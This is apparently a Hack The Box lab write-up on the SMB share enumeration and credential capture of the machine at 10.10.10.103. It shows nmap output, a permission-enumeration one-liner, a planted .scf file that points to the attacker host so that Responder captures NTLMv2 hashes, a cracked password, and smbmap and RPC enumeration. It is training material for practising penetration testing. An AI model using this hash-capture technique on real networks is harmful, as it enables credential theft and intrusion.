SMB

PORT    STATE SERVICE       REASON          VERSION
445/tcp open  microsoft-ds? syn-ack ttl 127
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| smb-protocols: 
|   dialects: 
|     2.0.2
|     2.1
|     3.0
|     3.0.2
|_    3.1.1
|_smb-print-text: false
| smb2-time: 
|   date: 2022-08-11T15:35:38
|_  start_date: 2022-08-11T15:33:45
| smb2-capabilities: 
|   2.0.2: 
|     Distributed File System
|   2.1: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0.2: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.1.1: 
|     Distributed File System
|     Leasing
|_    Multi-credit operations
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb-mbenum: 
|_  ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

SMB NULL SHARES

	dr--r--r--                0 Mon Jul  2 15:16:54 2018	2018
	.\Department Shares\Users\*
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	.
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	..
	dr--r--r--                0 Mon Jul  2 15:18:43 2018	amanda
	dr--r--r--                0 Mon Jul  2 15:19:06 2018	amanda_adm
	dr--r--r--                0 Mon Jul  2 15:18:28 2018	bill
	dr--r--r--                0 Mon Jul  2 15:18:31 2018	bob
	dr--r--r--                0 Mon Jul  2 15:19:14 2018	chris
	dr--r--r--                0 Mon Jul  2 15:18:39 2018	henry
	dr--r--r--                0 Mon Jul  2 15:18:34 2018	joe
	dr--r--r--                0 Mon Jul  2 15:18:53 2018	jose
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	lkys37en
	dr--r--r--                0 Mon Jul  2 15:18:48 2018	morgan
	dr--r--r--                0 Mon Jul  2 15:19:20 2018	mrb3n
	dr--r--r--                0 Wed Sep 26 01:45:32 2018	Public

Was able to get a list of other users who I might be able to roast.

Unfortunately for us kerberos isnt open to the public therefore that is why we were unable to execute AESEPRoast attacks.

However after mounting hte share we were able to see the users and the permissions to these folders.

Using the followowing Script

tput civis; for directory in $(ls); do echo -e "\n [*] Enumerating Permissions in the $directory:\n"; echo -e "\t$(smbcacls "//10.10.10.103/Department Shares" Users/$directory -N | grep "Everyone")"; done; tput cnorm
[*] Enumerating Permissions in the Public:

	ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ

Since we have write acess to the Public folder there is many ways that we coudl get a shell out of this, we coudl possibly steal hashes as well as possibly putting files like an hta file.

After starting responder and placing the following .scf file I was able to capture NTLMv2 Hashes.

[Shell]
Command=2
IconFile=\\10.10.14.7\home\kali\driver.scf
[Taskbar]
Command=ToggleDesktop

Now we can try to enumerate again with these credentials and start all over. The password was Ashare1972.

• cme

• winrm

• psexec

• ldap

• rpc

• smbshare

• kerberosroast

smbmap -H 10.10.10.103 -u 'amanda' -p 'Ashare1972'       
[+] IP: 10.10.10.103:445	Name: HTB.LOCAL                                         
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
	Department Shares                                 	READ ONLY	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Operations                                        	NO ACCESS	
	SYSVOL                                            	READ ONLY	Logon server share 

We could have additional permisisons to access other shares.

RPC

user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[amanda] rid:[0x450] user:[mrlky] rid:[0x643] user:[sizzler] rid:[0x644]